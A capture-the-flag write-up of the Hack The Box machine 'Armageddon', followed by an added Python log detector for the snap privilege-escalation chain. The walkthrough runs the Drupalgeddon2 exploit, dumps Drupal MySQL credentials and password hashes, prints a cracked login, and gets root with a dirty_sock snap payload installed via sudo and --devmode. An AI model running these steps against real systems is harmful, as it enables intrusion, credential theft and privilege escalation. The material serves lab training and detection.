Info

Armageddon is an easy Linux-based machine, created by bertolis.

Enumeration

Let’s run a network scan to check open ports and service versions.

Scanning Result

The SSH and HTTP ports are open. We should be able to visit the page on 10.10.10.233.

Login Page

And yes, there is a login page. Let’s explore it. The page itself shows nothing interesting, but the page source and Wappalyzer do…

Found Drupal Version
Wappalyzer Result

Exploitation

That was easy to discover. Drupal 7.x has multiple known vulnerabilities, including PHP object injection and remote code execution. Let’s google it.

Drupalgeddon2 Exploit

The exploit’s name is actually very similar to Armageddon. Too easy if it’s the right one. Let’s git clone it and run it. It has a very good explanation of how to use it; check it on GitHub here.

Downloading Exploit

Before running it, make sure you have the highline gem installed.

sudo gem install highline

And then run the exploit.

./drupalgeddon2.rb http://10.10.10.233/
Getting Shell

And we got it. But there is no user.txt, which means we need to explore further.

User Escalation

Since we can’t use the cd command, we need to explore manually (ls /some/path or cat /some/path/file.txt).

Files

An interesting directory is sites, where we may find credentials.

MySQL Credentials

And we found them. Let’s connect to MySQL with these credentials. We can’t connect from our local machine, so let’s log in from the shell we got. Since we can’t get an actual interactive MySQL shell, we will use single MySQL commands.

mysql -u [Username] -p[Password] -e "[Command to execute..]"
mysql -u drupaluser [email protected]*m23gBVj -e 'show databases'
Single MySQL Command

And we can see the drupal database; let’s check its tables.

mysql -u drupaluser [email protected]*m23gBVj -D drupal -e 'show tables'

And the users table is there! Let’s check it.

mysql -u drupaluser [email protected]*m23gBVj -D drupal -e 'SELECT * FROM users'
Users

There are password hashes and usernames. The first one, brucetherealadmin, has an email set, [email protected], and that email differs from the other ones, so he might be the main user. We will try to crack these hashes with john.

Cracked Password

I already did this machine, so I’ll just show the password john cracked earlier. The command for cracking is in the image. Now that we have credentials, let’s log in: brucetherealadmin:booboo

User

Got user! Now, let’s own root.

Root Escalation

First, we’ll check sudo capabilities.

Sudo Capabilities

We can run snap install without a password! Great, we can look for an exploit that escalates privileges through snap. Let’s google it.

Results

We will check the first one, named dirty_sock on GitHub. Clone it to your local machine.

Downloading Exploit

I tried to transfer both scripts to the target machine, but it didn’t work. We need to install it on the target machine manually. I was looking at the scripts and found this in dirty_sockv2.py:

dirty_sockv2.py

So, we’ll copy this, print it on the target machine into a .snap installation file, and install it on the target system. We will use this command on the target machine to create the installation snap file:

python3 -c 'print("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" + "A"*4256 + "==")' | base64 -d > installation.snap

And then,

sudo /usr/bin/snap install --devmode installation.snap

--devmode installs a snap without enforcing snapd’s confinement security policies, which is why a locally built snap can be installed this way.

Installed

We will read README.md now to see how to use it.

README.md

Okay, so we need to become the dirty_sock user. Let’s do this.

Changing User

Yay! We are dirty_sock! If you get an error that the user doesn’t exist, just reset the machine. I had the same problem. Now, we will try to become root. Just type sudo su.

Root

Wooah, we got root! If it asks you for a password, use dirty_sock as the password.
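As an added example (not part of this writeup or the dirty_sock project), here is a small Python detector for the chain above from the defender’s side: a local snap installed through sudo with --devmode, a new account appearing right after it, and that account using sudo to reach root. The auth.log-style format and the sample lines are constructed assumptions, not logs from the machine.

```python
import re
from typing import Dict, List

# Constructed auth.log-style sample (not from the box): an unconfined local
# snap install, then a new account, then that account going to root via sudo.
SAMPLE_LOG = """\
Apr  3 10:12:01 web sudo: brucetherealadmin : TTY=pts/0 ; PWD=/home/brucetherealadmin ; USER=root ; COMMAND=/usr/bin/snap install --devmode installation.snap
Apr  3 10:12:05 web useradd[2201]: new user: name=dirty_sock, UID=1001, GID=1001, home=/home/dirty_sock, shell=/bin/bash
Apr  3 10:13:40 web sudo: dirty_sock : TTY=pts/0 ; PWD=/home/dirty_sock ; USER=root ; COMMAND=/bin/su
Apr  3 10:15:00 web sudo: alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update
"""

SUDO_RE = re.compile(r"sudo: (?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")
USERADD_RE = re.compile(r"useradd\[\d+\]: new user: name=(?P<name>[^,]+)")
# A local .snap file, or --devmode/--dangerous (both real snap flags), means the
# install bypassed store signing and/or confinement.
SNAP_RISKY_RE = re.compile(r"\bsnap install\b.*(--devmode|--dangerous|\S+\.snap\b)")


def analyze(log_text: str) -> List[Dict[str, str]]:
    """Return findings for the unconfined-snap -> new-user -> sudo-root chain."""
    findings: List[Dict[str, str]] = []
    risky_install_seen = False
    suspicious_users = set()
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if m:
            user, target, cmd = m.group("user", "target", "cmd")
            if SNAP_RISKY_RE.search(cmd):
                risky_install_seen = True
                findings.append({"rule": "unconfined_snap_install", "user": user, "cmd": cmd})
            elif user in suspicious_users and target == "root":
                findings.append({"rule": "new_account_sudo_root", "user": user, "cmd": cmd})
            continue
        m = USERADD_RE.search(line)
        if m and risky_install_seen:
            # Account creation right after an unconfined install is the
            # tell-tale of an install hook adding a user.
            name = m.group("name")
            suspicious_users.add(name)
            findings.append({"rule": "account_created_after_snap_install", "user": name, "cmd": ""})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The same three rules are easy to express for a SIEM; the point is correlating the install with the account creation that follows it, not the snap command alone.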

PWNED!

Thank you for reading this writeup. If you want to support my work:

Hack The Box Buy Me A Coffee GitHub Discord